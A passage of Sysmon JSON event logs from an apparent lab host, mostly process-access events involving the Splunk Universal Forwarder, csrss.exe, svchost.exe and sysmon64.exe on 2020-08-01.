06:51:49.381","ProcessGuid":"{E2A3D6B1-1105-5F25-0000-0010D2950500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-strptime --log-warnings","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{E2A3D6B1-1104-5F25-0000-0010B08A0500}","ParentProcessId":"3828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3720,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.370\r\nSourceProcessGUID: {E2A3D6B1-1104-5F25-0000-0010B08A0500}\r\nSourceProcessId: 3828\r\nSourceThreadId: 3824\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {E2A3D6B1-1105-5F25-0000-0010D2950500}\r\nTargetProcessId: 4748\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+13671|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18192|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.370","SourceProcessGUID":"{E2A3D6B1-1104-5F25-0000-0010B08A0500}","SourceProcessId":"3828","SourceThreadId":"3824","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{E2A3D6B1-1105-5F25-0000-0010D2950500}","TargetProcessId":"4748","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+13671|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18192|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3721,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.370\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1105-5F25-0000-0010D2950500}\r\nTargetProcessId: 4748\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.370","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1105-5F25-0000-0010D2950500}","TargetProcessId":"4748","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3722,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3723,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3724,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3725,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3726,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3727,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
